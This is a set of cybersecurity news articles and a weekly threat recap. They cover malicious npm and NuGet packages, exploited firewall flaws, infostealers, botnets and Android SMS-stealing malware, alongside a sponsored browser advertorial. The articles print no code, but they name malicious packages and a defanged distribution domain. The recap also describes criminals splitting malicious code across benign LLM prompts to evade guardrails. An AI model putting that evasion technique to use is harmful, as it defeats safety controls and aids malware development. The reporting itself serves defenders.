2025-12-23 AI创业新闻
Fake WhatsApp API Package on npm Steals Messages, Contacts, and Login Tokens
Cybersecurity researchers have disclosed details of a new malicious package on the npm repository that works as a fully functional WhatsApp API, but also contains the ability to intercept every message and link the attacker’s device to a victim’s WhatsApp account. The package, named “ lotusbail ,” has been downloaded over 56,000 times since it was first uploaded to the registry by a user named “seiren_primrose” in May 2025. Of these, 711 downloads took place over the last week. The library is still available for download as of writing.
Under the cover of a functional tool, the malware “steals your WhatsApp credentials, intercepts every message, harvests your contacts, installs a persistent backdoor, and encrypts everything before sending it to the threat actor’s server,” Koi Security researcher Tuval Admoni said in a report published over the weekend. Specifically, it’s equipped to capture authentication tokens and session keys, message history, contact lists with phone numbers, as well as media files and documents. More significantly, the library is inspired by @whiskeysockets/baileys , a legitimate WebSockets-based TypeScript library for interacting with the WhatsApp Web API. This is accomplished by means of a malicious WebSocket wrapper through which authentication information and messages are routed, thereby allowing it to capture credentials and chats.
The stolen data is transmitted to an attacker-controlled URL in encrypted form. The attack doesn’t stop there, for the package also harbors covert functionality to create persistent access to the victim’s WhatsApp account by hijacking the device linking process by using a hard-coded pairing code. “When you use this library to authenticate, you’re not just linking your application – you’re also linking the threat actor’s device,” Admoni said. “They have complete, persistent access to your WhatsApp account, and you have no idea they’re there.” By linking their device to the target’s WhatsApp, it not only allows continued access to their contacts and conversations but also enables persistent access even after the package is uninstalled from the system, given the threat actor’s device remains linked to the WhatsApp account until it’s unlinked by navigating to the app’s settings.
Koi Security’s Idan Dardikman told The Hacker News that the malicious activity is triggered when the developer uses the library to connect to WhatsApp. “The malware wraps the WebSocket client, so once you authenticate and start sending/receiving messages, the interception kicks in,” Dardikman said. “No special function needed beyond normal usage of the API. The backdoor pairing code also activates during the authentication flow – so the attacker’s device gets linked the moment you connect your app to WhatsApp.” Furthermore, “lotusbail” comes fitted with anti-debugging capabilities that cause it to enter into an infinite loop trap when debugging tools are detected, causing it to freeze execution.
“Supply chain attacks aren’t slowing down – they’re getting better,” Koi said. “Traditional security doesn’t catch this. Static analysis sees working WhatsApp code and approves it. Reputation systems have seen 56,000 downloads, and trust it.
The malware hides in the gap between ‘this code works’ and ‘this code only does what it claims.’” Malicious NuGet Packages Target the Crypto Ecosystem The disclosure comes as ReversingLabs shared details of 14 malicious NuGet packages that impersonate Nethereum, a .NET integration library for the Ethereum decentralized blockchain, and other cryptocurrency-related tools to redirect transaction funds to attacker-controlled wallets when the transfer amount exceeded $100 or exfiltrate private keys and seed phrases. The names of the packages, published from eight different accounts, are listed below - binance.csharp bitcoincore bybitapi.net coinbase.net.api googleads.api nbitcoin.unified nethereumnet nethereumunified netherеum.all solananet solnetall solnetall.net solnetplus solnetunified The packages have leveraged several techniques to lull users into a false sense of trust in security, including inflating download counts and publishing dozens of new versions in a short amount of time to give the impression that it’s being actively maintained. The campaign dates all the way back to July 2025. The malicious functionality is injected such that it’s only triggered when the packages are installed by developers and specific functions are embedded into other applications.
Notable among the packages is GoogleAds.API, which focuses on stealing Google Ads OAuth information instead of exfiltrating wallet data secrets. “These values are highly sensitive, because they allow full programmatic access to a Google Ads account and, if leaked, attackers can impersonate the victim’s advertising client, read all campaign and performance data, create or modify ads, and even spend unlimited funds on a malicious or fraudulent campaign,” ReversingLabs said. Found this article interesting? Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
⚡ Weekly Recap: Firewall Exploits, AI Data Theft, Android Hacks, APT Attacks, Insider Leaks & More
Cyber threats last week showed how attackers no longer need big hacks to cause big damage. They’re going after the everyday tools we trust most — firewalls, browser add-ons, and even smart TVs — turning small cracks into serious breaches. The real danger now isn’t just one major attack, but hundreds of quiet ones using the software and devices already inside our networks. Each trusted system can become an entry point if it’s left unpatched or overlooked.
Here’s a clear look at the week’s biggest risks, from exploited network flaws to new global campaigns and fast-moving vulnerabilities. ⚡ Threat of the Week Flaws in Multiple Network Security Products Come Under Attack — Over the past week, Fortinet , SonicWall , Cisco , and WatchGuard said vulnerabilities in their products have been exploited by threat actors in real-world attacks. Cisco said attacks exploiting CVE-2025-20393, a critical flaw in AsyncOS, have been abused by a China-nexus advanced persistent threat (APT) actor codenamed UAT-9686 to deliver malware such as ReverseSSH (aka AquaTunnel), Chisel, AquaPurge, and AquaShell. The flaw remains unpatched.
SonicWall said attacks exploiting CVE-2025-40602, a local privilege escalation flaw impacting Secure Mobile Access (SMA) 100 series appliances, have been observed in connection with CVE-2025-23006 (CVSS score 9.8) to achieve unauthenticated remote code execution with root privileges. The development comes as firewalls and edge appliances have become a favorite target for attackers, giving attackers deeper visibility into traffic, VPN connections, and downstream systems. Cyber Forum 2026: Adversary Trends, AI Innovation, and the Future of Security Ops A virtual cybersecurity forum for today’s security leaders. Discover how AI and automation strengthen defenses, streamline operations, and deliver measurable business impact.
Hear from security leaders and research experts and get actionable strategies and trends. Register for free today. Secure Your Seat ➝ 🔔 Top News Featured Chrome Extension Caught Harvesting AI Chats — Urban VPN Proxy, a Google Chrome and Microsoft Edge extension, with more than 7.3 installations, was observed stealthily gathering every prompt entered by users into artificial intelligence (AI)-powered chatbots like OpenAI ChatGPT, Anthropic Claude, Microsoft Copilot, DeepSeek, Google Gemini, xAI Grok, Meta AI, and Perplexity. Three other extensions from the same developer, 1ClickVPN Proxy, Urban Browser Guard, and Urban Ad Blocker, were also updated with similar functionality.
Collectively, these add-ons were installed more than eight million times. The extensions are no longer available for download from the Chrome Web Store. Ink Dragon Targets Governments with ShadowPad and FINALDRAFT — The threat actor known as Jewelbug (CL-STA-0049, Earth Alux, Ink Dragon, and REF7707) has been increasingly focusing on government targets in Europe since July 2025, even as it continues to attack entities located in Southeast Asia and South America. The campaign has “impacted several dozen victims, including government entities and telecommunications organizations, across Europe, Asia, and Africa.” Ink Dragon does not merely use victims for data theft but actively repurposes them to support ongoing operations against other targets of interest.
This creates a self-sustaining infrastructure that obscures the true origin of the attacks while maximizing the utility of every compromised asset. Kimwolf Botnet Hijacks 1.8 Million Android TVs — A new botnet named Kimwolf is powered by no less than 1.8 million Android TVs. Infections are scattered globally, with Brazil, India, the U.S., Argentina, South Africa, and the Philippines registering higher concentrations. Kimwolf is believed to share its origins with AISURU, which has been behind some of the record-breaking DDoS attacks over the past year.
It’s suspected that the attackers reused code from AISURU in the early stages, before opting to develop the Kimwolf botnet to evade detection. QiAnXin XLab said it’s possible some of these attacks may not have come from AISURU alone, and that Kimwolf may be either participating or even leading the efforts. LongNosedGoblin Uses Group Policy For Malware Deployment — A previously undocumented China-aligned threat cluster dubbed LongNosedGoblin has been attributed to a series of cyber attacks targeting governmental entities in Southeast Asia and Japan. Central to the group’s tradecraft is the abuse of Group Policy to deploy malware across the compromised network and cloud services for communication with infected endpoints using a backdoor dubbed NosyDoor.
The threat actor is believed to be active since at least September 2023. The exact initial access methods used in the attacks are presently unknown. Kimsuky Uses DocSwap Android Malware — The North Korean threat actor known as Kimsuky has been linked to a new campaign that distributes a new variant of Android data gathering malware called DocSwap via QR codes hosted on phishing sites mimicking Seoul-based logistics firm CJ Logistics (formerly CJ Korea Express). The apps masquerade as package delivery service apps.
It’s believed that the threat actors are using smishing texts or phishing emails impersonating delivery companies to deceive recipients into clicking on booby-trapped URLs hosting the apps. A noteworthy aspect of the attack is its QR code-based mobile redirection, which prompts users visiting the URLs from a desktop computer to scan a QR code displayed on the page on their Android device to install the supposed shipment tracking app and look up the status. ️🔥 Trending CVEs Hackers act fast. They can use new bugs within hours.
One missed update can cause a big breach. Here are this week’s most serious security flaws. Check them, fix what matters first, and stay protected. This week’s list includes — CVE-2025-14733 (WatchGuard), CVE-2025-11901, CVE-2025-14302, CVE-2025-14303, CVE-2025-14304 (pre-boot DMA protection Bypass), CVE-2025-37164 (HPE OneView Software), CVE-2025-59374 (ASUS Live Update), CVE-2025-20393 (Cisco AsyncOS), CVE-2025-40602 (SonicWall SMA 100 Series), CVE-2025-66430 (Plesk), CVE-2025-33213 (NVIDIA Merlin Transformers4Rec for Linux), CVE-2025-33214 (NVIDIA NVTabular for Linux), CVE-2025-54947 (Apache StreamPark), CVE-2025-13780 (pgAdmin), CVE-2025-34352 (JumpCloud Agent), CVE-2025-14265 (ConnectWise ScreenConnect), CVE-2025-40806, CVE-2025-40807 (Siemens Gridscale X Prepay), CVE-2025-32210 (NVIDIA Isaac Lab), CVE-2025-64374 (Motors WordPress theme), CVE-2025-64669 (Microsoft Windows Admin Center), CVE-2025-46295 (Apache Commons Text), CVE-2025-68154 (systeminformation), CVE-2025-14558 (FreeBSD), and cross-site scripting and information disclosure flaws in Roundcube Webmail (no CVEs).
📰 Around the Cyber World FBI Warns of Campaigns Impersonating Government Officials — The U.S. Federal Bureau of Investigation (FBI) has warned that malicious actors have impersonated senior U.S. state government, White House, and Cabinet-level officials, as well as members of Congress, to target individuals, including officials’ family members and personal acquaintances, since at least 2023. The “Malicious actors have sent text messages and AI-generated voice messages — techniques known as smishing and vishing, respectively — that claim to come from a senior U.S.
official to establish rapport with targeted individuals,” the FBI said . “In the scheme, actors contact an individual and briefly engage on a topic the victim is versed on, with a request to move communication to a secondary, encrypted mobile messaging application, happening almost immediately.” Once the conversation has shifted to Signal or WhatsApp, the threat actors urge victims to provide an authentication code that allows the actors to sync their device with the victim’s contact list, share Personally Identifiable Information (PII) and copies of sensitive personal documents, wire funds to an overseas financial institution under false pretenses, and request them to introduce the actor to a known associate. Noyb Files Complaint Against TikTok, AppsFlyer and Grindr — Austrian privacy non-profit noyb has filed complaints against TikTok, AppsFlyer, and Grindr, accusing the popular video sharing platform of unlawfully tracking users across apps in violation of GDPR laws in the region. “A user found out about this unlawful tracking practice through an access request – which showed that, e.g.
his usage of Grindr was sent to TikTok, likely via the Israeli tracking company AppsFlyer – which allows TikTok to draw conclusions about his sexual orientation and sex life,” noyb said. “TikTok initially even withheld this information from the user, which violates Article 15 GDPR. Only after repeated inquiries, TikTok revealed that it knows which apps he used, what he did within these apps (for example, adding a product to the shopping cart) - and that this data also included information about his usage of the gay dating app Grindr.” AuraStealer Spotted in the Wild — An emerging malware-as-a-service (MaaS) information stealer called AuraStealer has been distributed via Scam-Yourself campaigns, where victims are lured by TikTok videos disguised as product activation guides. “Viewers are instructed to manually retype and run a displayed command in an administrative PowerShell, which, however, instead of activating the software, quietly downloads and executes the malicious payload,” Gen Digital said .
“Apart from TikTok Scam-Yourself campaigns, AuraStealer is also distributed through supposedly cracked games or software, with delivery chains of varying complexity.” AuraStealer makes use of a long list of anti-analysis and obfuscation techniques, including indirect control flow obfuscation, string encryption, and exception-driven API hashing, to resist attempts to reverse engineer the malware. It’s capable of harvesting data from Chromium- and Gecko-based browsers, cryptocurrency wallets from desktop applications and browser extensions, clipboard contents, session tokens, credentials, VPNs, password managers, screenshots, and detailed system metadata. Also detected in the wild are two other information stealers named Stealka and Phantom , with the latter distributed via fake Adobe installers. Blind Eagle Continues to Attack Colombia — Colombian institutions have continued to face attacks from a threat actor known as Blind Eagle .
The latest phishing attacks, targeting agencies under the Ministry of Commerce, Industry and Tourism (MCIT), have shifted to a more sophisticated, multi-layer flow that uses an off-the-shelf loader named Caminho to deliver DCRat. The messages are sent from compromised email accounts within the same organization to bypass security checks. “The phishing email used a legal-themed design to lure the recipient,” Zscaler said . “The email was created to appear as an official message from the Colombian judicial system, referencing a labor lawsuit with an authentic-sounding case number and date.
The email pressures the recipient to confirm receipt immediately, leveraging authority, fear of legal consequences, and confidentiality warnings to trick the recipient into taking an action, namely opening the attachment.” Scripted Sparrow Linked to Large-Scale BEC Attacks — A sprawling Business Email Compromise (BEC) collective known as Scripted Sparrow has been observed distributing more than three million email messages each month and refining its social-engineering playbook. “The scale of the group’s operation strongly suggests the use of automation to generate and send their attack messages,” Fortra said . “The group utilizes a combination of free webmail addresses as well as addresses on domains they’ve registered specifically for their operations. The group operates by posing as various executive coaching and leadership training consultancies.” The group is estimated to have registered 119 domains and used 245 webmail addresses.
It has also used 256 bank accounts to move money out of victims’ bank accounts. Smart Devices Run Outdated Browser Versions — An academic study by a team of Belgian researchers has found that a majority of smart devices, such as smart TVs, e-readers, and gaming consoles, come with an embedded web browser that runs extremely outdated versions, sometimes as much as three years. All five e-readers that were tested, and 24 of 35 smart TV models, used embedded browsers that were at least three years behind current versions available to users of desktop computers. These outdated, embedded browsers can leave users open to phishing and other security vulnerabilities.
The authors said some of the issues lie in how development frameworks like Electron bundle browsers with other components. “We suspect that, for some products, this issue stems from the user-facing embedded browser being integrated with other UI components, making updates challenging – especially when bundled in frameworks like Electron, where updating the browser requires updating the entire framework,” they said in the paper. “This can break dependencies and increase development costs.” Denmark Blames Russia For Attack on Water Utility — The Danish Defence Intelligence Service (DDIS) has blamed Russia for recent destructive and disruptive cyber attacks against the country, including a water utility in 2024, as well as distributed denial-of-service (DDoS) attacks on Danish websites in the run-up to the 2025 municipal and regional council elections. The attacks have been attributed to pro-Russian hacktivist groups Z-Pentest and NoName057(16), respectively.
“The Russian state uses both groups as instruments of its hybrid war against the West. The aim is to create insecurity in the targeted countries and to punish those who support Ukraine,” the DDIS said. “Russia’s cyber operations form part of a broader influence campaign intended to undermine Western support for Ukraine.” The statement comes a few days after a global cybersecurity advisory warned that pro-Russian hacktivist groups conduct opportunistic attacks against US and global critical infrastructure. Russia Targeted by Arcane Werewolf — Russian manufacturing companies have become the target of a threat actor known as Arcane Werewolf (aka Mythic Likho).
Campaigns undertaken by the hacking group in October and November 2025 likely leveraged phishing emails as the initial access vector that presumably contained links to a malicious archive hosted on the attackers’ server. The links directed victims to a spoofed website imitating a Russian manufacturing company. The end goal of the attacks is to deploy a custom implant named Loki 2.1 by means of a loader that’s delivered using a Go-based dropper downloaded from an external server using PowerShell code embedded into a Windows shortcut (LNK) contained in the ZIP file. In an attack chain detected in November 2025, a new C++ dropper was used to propagate the malware.
Loki 2.1 is equipped to upload/download files, inject code into a target process, terminate arbitrary processes, retrieve environment variables, and stop its own execution. RansomHouse Upgrades to Complex Encryption — The RansomHouse (aka Jolly Scorpius) ransomware group has upgraded its file encryption process to use two different encryption keys to encrypt files as part of their attacks in what has been described as a significant escalation and “concerning trajectory” in ransomware development. “The upgraded version’s code reveals a two-factor encryption scheme where the file is encrypted with both a primary key and a secondary key. Data encryption is processed separately for each key,” Palo Alto Networks Unit 42 said .
“This significantly increases the difficulty of decrypting the data without both keys.” The e-crime group has been active since December 2021, listing 123 victims on its data leak site. Central to the threat actor’s operations is a tool called MrAgent that provides attackers with persistent access to a victim’s environment and simplifies managing compromised hosts at scale. It’s also responsible for deploying Mario to encrypt critical VM files in the ESXi hypervisor. LLMs and Ransomware Lifecycle — The emergence of large language models (LLMs) is likely accelerating the ransomware lifecycle, according to new findings from SentinelOne.
“We observe measurable gains in speed, volume, and multilingual reach across reconnaissance, phishing, tooling assistance, data triage, and negotiation, but no step-change in novel tactics or techniques driven purely by AI at scale,” the company said. LLMs, including those that are deployed locally, can be used to replace the manual effort associated with drafting phishing emails and localized content, search for sensitive data, and develop malicious code. The continued sightings of various dark LLMs show that criminals are gravitating toward uncensored models that allow them to evade guardrails. “Actors already chunk malicious code into benign prompts across multiple models or sessions, then assemble offline to dodge guardrails,” SentinelOne said .
“This workflow will become commoditized as tutorials and tooling proliferate, ultimately maturing into ‘prompt smuggling as a service.’” The findings signal that the barrier to entry into cybercrime continues to drop, even as the ransomware ecosystem is splintering and the line between nation-state and crimeware activity is increasingly blurring. The use of the technology is also likely to blur existing assessment lines around tradecraft and attribution, owing to the fact that the capabilities even allow smaller groups to acquire capabilities that were once limited to advanced state-backed actors. TikTok Signs Agreement to Create New U.S. Joint Venture — Nearly a year after TikTok’s operations were briefly banned in the U.S.
for national security concerns, the popular video-sharing platform said it has finalized a deal to move a substantial portion of its U.S. business under a new joint venture named TikTok USDS Joint Venture LLC. According to reports from Axios , Bloomberg , CNBC , and The Hollywood Reporter , the company has signed agreements with the three managing investors: Oracle, Silver Lake, and Abu Dhabi-based MGX. Together, those companies will own 45% of the U.S.
operation, while ByteDance retains a nearly 20% share. The new entity is said to be responsible for protecting U.S. data, ensuring the security of its prized algorithm, content moderation, and “software assurance.” Oracle will be the trusted security partner in charge of auditing and validating compliance. The agreement is set to go into effect on January 22, 2026.
Under a national security law, China-based ByteDance was required to divest TikTok’s U.S. operations or face an effective ban in the country. The U.S. government has since extended the ban four times as a deal was being hatched behind the scenes.
Under President Donald Trump’s executive order in September, the attorney general was blocked from enforcing the national security law for a 120-day period in order to “permit the contemplated divestiture to be completed,” allowing the deal to finalize by January 23, 2026. Android Adware Campaign Targets East and Southeast Asia — Android users in the Philippines, Pakistan, and Malaysia have been targeted by a large-scale Android adware campaign dubbed GhostAd that silently drains resources and disrupts normal phone use through persistent background activity. The set of 15 apps, distributed via Google Play, masqueraded as harmless utility and emoji-editing tools such as Vivid Clean and GenMoji Studio. “Behind their cheerful icons, these apps created a persistent background advertising engine – one that kept running even after users closed or rebooted their devices, quietly consuming battery and mobile data,” Check Point said .
“GhostAd integrates multiple legitimate advertising software development kits (SDKs), including Pangle, Vungle, MBridge, AppLovin, and BIGO, but uses them in a way that violates fair-use policies. Instead of waiting for user interaction, the apps continuously load, queue, and refresh ads in the background, using Kotlin coroutines to sustain the cycle.” The apps have since been removed by Google, but not before they amassed millions of downloads. Texas Sues TV Makers for Spying on Owners — Texas Attorney General Ken Paxton accused Sony, Samsung, LG, Hisense, and TCL of spying on their customers and illegally collecting their data by using automatic content recognition ( ACR ), according to a new lawsuit. “ACR in its simplest terms is an uninvited, invisible digital invader,” Paxton said .
“This software can capture screenshots of a user’s television display every 500 milliseconds, monitor viewing activity in real time, and transmit that information back to the company without the user’s knowledge or consent. This conduct is invasive, deceptive, and unlawful.” Cybercriminals Entice Insiders with High Payouts — Check Point has called attention to dark web posts that aim to recruit insiders within organizations to gain access to corporate networks, user devices, and cloud environments. The activity targets the financial sector and cryptocurrency firms, as well as companies like Accenture, Genpact, Netflix, and Spotify. The ads offer payouts from $3,000 to $15,000 for access or data.
“Across darknet forums, employees are being approached, or even volunteering, to sell access or sensitive information for lucrative rewards,” the company said . When internal staff disable defenses, leak credentials, or provide privileged information, preventing an attack becomes exponentially harder. Monitoring the deep web and darknet for organizational mentions or stolen data is now as critical as deploying advanced cyber prevention technologies.” Flaws in Anno 1404 Game — Synacktiv researchers have disclosed multiple vulnerabilities in a strategy game named Anno 1404 that, if chained together, allow for arbitrary code execution from within the multiplayer mode. JSCEAL Campaign Undergoes a Shift — A Facebook ads campaign that’s used to distribute a compiled V8 JavaScript (JSC) malware called JSCEAL has evolved into a more sophisticated form, with the attackers adopting a revamped command-and-control (C2) infrastructure, enhanced anti-analysis safeguards, and an updated script engine designed for increased stealth.
“In contrast to the 1H 2025 campaign, which relied primarily on .com domains, the August 2025 campaign includes a broader variety of top-level domains such as .org, .link, .net, and others,” Cato Networks said . “These domains are registered in bulk at regular intervals, suggesting an automated, scalable provisioning workflow.” What’s more, the updated infrastructure enforces stricter filtering and anti-analysis controls, blocking any HTTP request that does not present a PowerShell User-Agent. In the event a request includes the correct PowerShell User-Agent, the server responds with a fake PDF error rather than delivering the actual payload. It’s only after the PDF has been returned that the C2 server delivers the next stage, including a modified version of the ZIP file containing the stealer malware.
Third Defendant Pleads Guilty to Hacking Fantasy Sports and Betting Website — Nathan Austad, 21, of Farmington, Minnesota, has pleaded guilty in connection with a scheme to hack thousands of user accounts at an unnamed fantasy sports and betting website and sell access to those accounts with the goal of stealing hundreds of thousands of dollars from users. Austad and others launched a credential stuffing attack on the website in November 2022 and fully compromised approximately 60,000 user accounts. “In some instances, Austad and his co-conspirators were able to add a new payment method of their own on the account (i.e., to a newly added financial account belonging to the hacker) and then use it to withdraw all the existing funds in the victim account to themselves, thus stealing the funds in each affected Victim Account,” the U.S. Justice Department said.
“Using this method, Austad and others stole approximately $600,000 from approximately 1,600 victim accounts on the Betting Website.” Access to the victim accounts was then sold on various websites that traffic in stolen accounts. Drop in Critical CVEs in 2025 — The number of critical vulnerabilities flagged in 2025 is at 3,753, down from 4,629 in 2023 and 4,283 in 2024, even as the total number of CVEs has increased to more than 40,000. According to VulnCheck, about 25.9% of the 43,002 CVEs published in 2025 have been enriched with a CVSS v4 score. “What this ultimately suggests is that CVSS v4 adoption is constrained not by lack of availability, but by limited participation from some of the largest and most influential CVE publishers and enrichers,” it said .
“Commonly cited reasons include resource constraints, required tooling changes, and a perception that CVSS v4 provides limited additional value while increasing scoring complexity and operational overhead.” Amadey Uses Self-Hosted GitLab Instance to Distribute StealC — A new Amadey malware loader campaign has leveraged an exploited self-hosted GitLab instance (“gitlab.bzctoons[.]net”) to deliver the StealC infostealer. “This analysis reveals how threat actors are hijacking abandoned, self-hosted GitLab servers to create a legitimate-looking payload distribution infrastructure,” Trellix said . “The use of a long-standing domain with valid TLS certificates provides an effective evasion technique against traditional security controls.” While the domain appears to belong to a small-scale organization hosting GitLab with multiple users, evidence suggests that either the user account or the entire infrastructure has been compromised. U.S.
Dismantle E-Note Cryptocurrency Exchange — U.S. authorities seized the servers and infrastructure of the E-Note cryptocurrency exchange (“e-note.com,” “e-note.ws,” and “jabb.mn”) for allegedly laundering more than $70 million from ransomware attacks and account takeover attacks since 2017. No arrests have been announced. In tandem, authorities have also indicted the site’s operator, a 39-year-old Russian national named Mykhalio Petrovich Chudnovets, who is said to have started offering money laundering services to cybercriminals in 2010.
Chudnovets has been charged with one count of conspiracy to launder monetary instruments, which carries a maximum penalty of 20 years in prison. The takedown fits into a broader law enforcement effort aimed at taking down services that allow bad actors to abuse the financial system and cash out the ill-gotten proceeds. 🎥 Cybersecurity Webinars How Zero Trust and AI Catch Attacks With No Files, No Binaries, and No Indicators — Cyber threats are evolving faster than ever, exploiting trusted tools and fileless techniques that evade traditional defenses. This webinar reveals how Zero Trust and AI-driven protection can uncover unseen attacks, secure developer environments, and redefine proactive cloud security—so you can stay ahead of attackers, not just react to them.
Master Agentic AI Security: Learn to Detect, Audit, and Contain Rogue MCP Servers — AI tools like Copilot and Claude Code help developers move fast, but they can also create big security risks if not managed carefully. Many teams don’t know which AI servers (MCPs) are running, who built them, or what access they have. Some have already been hacked, turning trusted tools into backdoors. This webinar shows how to find hidden AI risks, stop shadow API key problems, and take control before your AI systems create a breach.
🔧 Cybersecurity Tools Tracecat — It is an open-source automation platform designed for security and IT teams that need flexible, scalable workflow orchestration. It combines simple YAML-based integration templates with a no-code interface for building workflows, along with built-in lookup tables and case management. Under the hood, workflows are orchestrated using Temporal to support reliability and scale, making Tracecat suitable for both local experimentation and production environments. Metis — It is an open-source, AI-powered security code review tool built by Arm’s Product Security Team.
It uses large language models to understand code context and logic, helping engineers find subtle security issues that traditional tools often miss. Metis supports multiple languages through plugins, works with different LLM providers, and is designed to reduce review fatigue in large or complex codebases while improving secure coding practices. Disclaimer: These tools are for learning and research only. They haven’t been fully tested for security.
If used the wrong way, they could cause harm. Check the code first, test only in safe places, and follow all rules and laws. Conclusion The past week made one point clear: the perimeter is gone, but accountability isn’t. Every device, app, and cloud service now plays a part in defense.
Patching fast, verifying what’s running, and questioning defaults are no longer maintenance tasks — they’re survival skills. As threats grow more adaptive, resilience comes from awareness and speed, not fear. Keep visibility high, treat every update as risk reduction, and remember that most breaches start with something ordinary left unchecked. Found this article interesting?
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
How to Browse the Web More Sustainably With a Green Browser
As the internet becomes an essential part of daily life, its environmental footprint continues to grow. Data centers, constant connectivity, and resource-heavy browsing habits all contribute to energy consumption and digital waste. While individual users may not see this impact directly, the collective effect of everyday browsing is significant. Choosing a browser designed with sustainability in mind is one practical way to reduce that impact, without changing how you work online.
This article explains what eco-friendly browsing means, why it matters, and how a green browser like Wave Browser pairs a modern, secure browsing experience with a mission to help protect our ocean through verified cleanup efforts. Why Eco-Friendly Browsing Matters Most people think of environmental impact in terms of transportation, food, or physical products. Digital activity is often overlooked. However: Browsers run continuously throughout the day Heavy tabs and background processes increase energy usage Ads and trackers load unnecessary data Inefficient browsing tools consume system resources Over time, these factors contribute to higher energy demand across devices and infrastructure.
Eco-friendly browsing focuses on reducing unnecessary digital load while keeping the browsing experience efficient, functional, and user-friendly. What Makes a Browser “Green”? A green or eco-conscious browser isn’t defined by a single feature. Instead, it combines responsible design choices with transparency and measurable impact.
Key characteristics include: Efficient use of system resources Built-in tools that reduce excess data loading Fewer unnecessary background processes A clear commitment to environmental responsibility Rather than asking users to change their habits, a green browser should fit naturally into everyday browsing. How Wave Browser Supports Eco-Friendly Browsing Wave Browser is designed for users who want a modern browsing experience while supporting environmental action. Its approach to eco browsing combines efficient technology with real-world impact with AppEsteem-certified software standards . Reducing Unnecessary Resource Usage Wave Browser includes built-in tools that help limit excess digital clutter.
Features like free ad blocking (available on Windows, Mac and Android), memory-saving tools, and integrated utilities reduce the need for multiple extensions and background processes. By cutting down on unnecessary data requests and system strain, Wave helps devices run more efficiently, using less energy over time. Using Built-In Tools Instead of Extra Extensions Many users install multiple browser extensions to manage everyday tasks. Each extension can introduce additional scripts, permissions, and background activity.
Wave Browser integrates common tools directly into the browser, such as: A sidebar for quick access to tools and favorite sites Built-in productivity features like split view and reading lists Tools for saving and organizing online content directly within the browser Keeping these tools built into the browser reduces the need for third-party add-ons developed outside the browser’s control, helping maintain a simpler and more predictable browsing environment. Browsing With Awareness, Not Disruption Eco-friendly browsing shouldn’t feel restrictive. Wave is designed to feel familiar from the first launch, with clear browser settings and an intuitive interface. Users can: Adjust privacy and browsing preferences Choose their default search engine Manage permissions for unfamiliar sites Use Incognito Mode when needed This balance allows users to browse comfortably while avoiding unnecessary digital noise.
Connecting Everyday Browsing to Real-World Impact Wave Browser goes beyond digital efficiency by linking browsing activity to verified environmental action. Through a Certified Cleanup Partnership with 4ocean , Wave helps fund the removal of plastic and trash from our ocean, rivers, and coastlines. Users support this effort simply by downloading and using the browser as part of their normal routine without special actions required. Cleanup efforts support: Professional cleanup crews Vessels and equipment Cleanup materials and operations Progress is tracked transparently through the browser homepage and through monthly impact reports shared by Wave, connecting everyday browsing to verified ocean cleanup efforts and a long-term goal of removing 300,000 pounds of trash from our ocean, rivers, and coastlines by 2028 .
Eco Browsing Without Changing How You Work One of the biggest barriers to sustainable technology is friction. If a product requires major behavior changes, adoption drops quickly. Wave Browser is designed to avoid that problem. It works like a modern browser should—efficient, intuitive, and flexible—while supporting more responsible browsing behind the scenes.
Users don’t need to browse differently. They simply browse with more intention built into the tool they already use every day. Making More Sustainable Choices Online Eco-friendly browsing isn’t about perfection . It’s about small, practical decisions that scale when adopted by many users.
By choosing a browser that: Uses resources efficiently Reduces unnecessary digital load Supports verified environmental action Users can make a meaningful difference without sacrificing usability or performance. Wave Browser shows how everyday technology can support both productivity and environmental responsibility, one browsing session at a time. Found this article interesting? This article is a contributed piece from one of our valued partners.
Follow us on Google News , Twitter and LinkedIn to read more exclusive content we post.
Android Malware Operations Merge Droppers, SMS Theft, and RAT Capabilities at Scale
Threat actors have been observed leveraging malicious dropper apps masquerading as legitimate applications to deliver an Android SMS stealer dubbed Wonderland in mobile attacks targeting users in Uzbekistan. “Previously, users received ‘pure’ Trojan APKs that acted as malware immediately upon installation,” Group-IB said in an analysis published last week. “Now, adversaries increasingly deploy droppers disguised as legitimate applications. The dropper looks harmless on the surface but contains a built-in malicious payload, which is deployed locally after installation – even without an active internet connection.” Wonderland (formerly WretchedCat), according to the Singapore-headquartered cybersecurity company, facilitates bidirectional command-and-control (C2) communication to execute commands in real-time, allowing for arbitrary USSD requests and SMS theft.
It masquerades as Google Play, or files of other formats, such as videos, photos, and wedding invitations. The financially motivated threat actor behind the malware, TrickyWonders, leverages Telegram as the primary platform to coordinate various aspects of the operation. First discovered in November 2023, it’s also attributed to two dropper malware families that are designed to conceal the primary encrypted payload - MidnightDat (First seen on August 27, 2025) RoundRift (First seen on October 15, 2025) Wonderland is mainly propagated using fake Google Play Store web pages, ad campaigns on Facebook, bogus accounts on dating apps, and messaging apps like Telegram, with the attackers abusing stolen Telegram sessions of Uzbek users sold on dark web markets to distribute APK files to victims’ contacts and chats. Once the malware is installed, it gains access to SMS messages and intercepts one-time passwords (OTPs), which the group uses to siphon funds from victims’ bank cards.
Other capabilities include retrieving phone numbers, exfiltrating contact lists, hiding push notifications to suppress security or one-time password (OTP) alerts, and even sending SMS messages from infected devices for lateral movement. However, it’s worth pointing out that sideloading the app first requires users to enable a setting that allows installation from unknown sources. This is accomplished by displaying an update screen that instructs them to “install the update to use the app.” “When a victim installs the APK and provides the permissions, the attackers hijack the phone number and attempt to log into the Telegram account registered with that phone number,” Group-IB said. “If the login succeeds, the distribution process is repeated, creating a cyclical infection chain.” Wonderland represents the latest evolution of mobile malware in Uzbekistan, which has shifted from rudimentary malware such as Ajina.Banker that relied on large-scale spam campaigns to more obfuscated strains like Qwizzserial that were found disguised as seemingly benign media files.
The use of dropper applications is strategic as it causes them to appear harmless and evade security checks. In addition, both the dropper and SMS stealer components are heavily obfuscated and incorporate anti-analysis tricks to make them a lot more challenging and time-consuming to reverse engineer. What’s more, the use of bidirectional C2 communication transforms the malware from a passive SMS stealer to an active remote-controlled agent that can execute arbitrary USSD requests issued by the server. “The supporting infrastructure has also become more dynamic and resilient,” the researchers said.
“Operators rely on rapidly changing domains, each of which is used only for a limited set of builds before being replaced. This approach complicates monitoring, disrupts blacklist-based defenses, and increases the longevity of command and control channels.” The malicious APK builds are generated using a dedicated Telegram bot, which is then distributed by a category of threat actors called workers in exchange for a share of the stolen funds. As part of this effort, each build is associated with its own C2 domains so that any takedown attempt does not bring down the entire attack infrastructure. The criminal enterprise also includes group owners, developers, and vbivers, who validate stolen card information.
